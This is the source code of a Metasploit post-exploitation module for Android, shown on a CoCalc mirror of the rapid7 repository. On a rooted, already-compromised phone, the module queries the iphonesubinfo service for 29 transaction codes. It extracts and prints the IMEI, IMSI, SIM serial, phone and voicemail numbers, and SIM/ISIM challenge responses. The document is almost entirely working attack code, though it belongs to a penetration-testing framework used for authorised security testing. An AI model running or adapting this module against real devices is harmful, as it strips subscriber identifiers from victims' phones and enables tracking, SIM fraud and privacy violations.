CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/android/gather/sub_info.rb
Views: 11623
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7


8
  include Msf::Post::Common

9
  include Msf::Post::Android::Priv

10
  include Msf::Post::Android::System

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        {

17
          'Name' => 'extracts subscriber info from target device',

18
          'Description' => %q{

19
            This module displays the subscriber info stored on the target phone.

20
            It uses call service to get values of each transaction code like imei etc.

21
          },

22
          'License' => MSF_LICENSE,

23
          'Author' => ['Auxilus'],

24
          'SessionTypes' => [ 'meterpreter', 'shell' ],

25
          'Platform' => 'android'

26
        }

27
      )

28
    )

29
  end

30


31
  def run

32
    unless is_root?

33
      print_error('This module requires root permissions.')

34
      return

35
    end

36


37
    @transaction_codes ||= [

38
      'DeviceId',

39
      'DeviceIdForSubscriber',

40
      'ImeiForSubscriber',

41
      'DeviceSvn',

42
      'SubscriberId',

43
      'SubscriberIdForSubscriber',

44
      'GroupIdLevel1',

45
      'GroupIdLevel1ForSubscriber',

46
      'IccSerialNumber',

47
      'IccSerialNumberForSubscriber',

48
      'Line1Number',

49
      'Line1NumberForSubscriber',

50
      'Line1AlphaTag',

51
      'Line1AlphaTagForSubscriber',

52
      'Msisdn',

53
      'MsisdnForSubscriber',

54
      'VoiceMailNumber',

55
      'VoiceMailNumberForSubscriber',

56
      'CompleteVoiceMailNumber',

57
      'CompleteVoiceMailNumberForSubscriber',

58
      'VoiceMailAlphaTag',

59
      'VoiceMailAlphaTagForSubscriber',

60
      'IsimImpi',

61
      'IsimDomain',

62
      'IsimImpu',

63
      'IsimIst',

64
      'IsimPcscf',

65
      'IsimChallengeResponse',

66
      'IccSimChallengeResponse'

67
    ]

68
    values ||= []

69
    arr ||= []

70
    for code in 1..@transaction_codes.length do

71
      print_status("using code : #{code}")

72
      cmd = "service call iphonesubinfo #{code}"

73
      block = cmd_exec(cmd)

74
      value, tc = get_val(block, code)

75
      arr << [tc, value]

76
    end

77


78
    tc_tbl = Rex::Text::Table.new(

79
      'Header' => 'Subscriber info',

80
      'Indent' => 1,

81
      'Columns' => ['transaction code', 'value']

82
    )

83


84
    arr.each do |a|

85
      tc_tbl << [

86
        a[0],     #  TRANSACTION CODE

87
        a[1]      #  value

88
      ]

89
    end

90
    print_line(tc_tbl.to_s)

91
  end

92


93
  def get_val(data, code)

94
    parsed = data.gsub(/Parcel/, '')

95
    string = ''

96
    100.times do |i|

97
      next if i % 2 == 0

98


99
      str = parsed.split("'")[i]

100
      break if str.nil?

101


102
      string += str

103
    end

104
    v = ''

105
    string.split('.').each do |chr|

106
      next if chr.nil? || (chr == "\n")

107


108
      v += chr

109
    end

110
    return v, @transaction_codes[code - 1]

111
  end

112
end

113


114